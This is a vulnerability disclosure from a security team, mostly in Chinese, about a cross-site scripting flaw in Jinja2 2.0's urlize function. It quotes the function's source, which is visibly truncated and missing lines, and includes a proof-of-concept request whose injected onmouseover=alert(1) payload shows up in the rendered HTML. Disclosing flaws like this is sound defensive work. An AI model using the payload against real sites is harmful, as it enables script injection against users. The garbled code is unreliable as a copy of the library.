~# n0tr00t Security Team

Jinja2 2.0 /utils.py urlize vulnerability

31 Oct 2014 - Evi1m0

[+] Author: Evi1m0
[+] Team: n0tr00t security team 
[+] From: http://www.n0tr00t.com
[+] Create: 2014-09-14


Jinja2(http://jinja.pocoo.org/)是基于python的模板引擎,功能比较类似于于PHP的smarty,J2ee的Freemarker和velocity。 它能完全支持unicode,并具有集成的沙箱执行环境,应用广泛。


问题出现在Jinja2(https://github.com/mitsuhiko/jinja2/tree/2.0) 2.0版本中,其中对urlize处理不当导致模板层使用处存在跨站脚本漏洞的产生。


/jinja2/utils.py 157-198:

def urlize(text, trim_url_limit=None, nofollow=False):
    """Converts any URLs in text into clickable links. Works on http://,
    https:// and www. links. Links can have trailing punctuation (periods,
    commas, close-parens) and leading punctuation (opening parens) and
    it'll still do the right thing.

    If trim_url_limit is not None, the URLs in link text will be limited
    to trim_url_limit characters.

    If nofollow is True, the URLs in link text will get a rel="nofollow"
    trim_url = lambda x, limit=trim_url_limit: limit is not None \
                         and (x[:limit] + (len(x) >=limit and '...'
                         or '')) or x
    words = _word_split_re.split(text)
    nofollow_attr = nofollow and ' rel="nofollow"' or ''
    for i, word in enumerate(words):
        match = _punctuation_re.match(word)
        if match:
            lead, middle, trail = match.groups()
            if middle.startswith('www.') or (
                '@' not in middle and
                not middle.startswith('http://') and
                len(middle) > 0 and
                middle[0] in string.letters + string.digits and (
                    middle.endswith('.org') or
                    middle.endswith('.net') or
                middle = '<a href="http://%s"%s>%s</a>' % (middle,
                    nofollow_attr, trim_url(middle))
            if middle.startswith('http://') or \
                middle = '<a href="%s"%s>%s</a>' % (middle,
                    nofollow_attr, trim_url(middle))
            if '@' in middle and not middle.startswith('www.') and \
               not ':' in middle and _simple_email_re.match(middle):
                middle = '<a href="mailto:%s">%s</a>' % (middle, middle)
            if lead + middle + trail != word:
                words[i] = lead + middle + trail
    return u''.join(words)

words = _word_split_re.split(text) 对传值text进行简单的正则处理,_word_split_re = re.compile(r’(\s+)’)。

随后words进入循环for i, word in enumerate(words)处理后return u’‘.join(words)。


def testtest(request):
    text = request.GET['bb2']
    return render(request, 'test.html', {'text': text})


GET: http://localhost/[email protected]”/onmouseover=alert(1)//

django views.py print:

Django version 1.6.1, using settings ‘fuzzing.settings’ Starting development server at Quit the server with CONTROL-C. [u’<a href=”mailto:[email protected]”/onmouseover=alert(1)//”>[email protected]”/onmouseover=alert(1)//</a>’]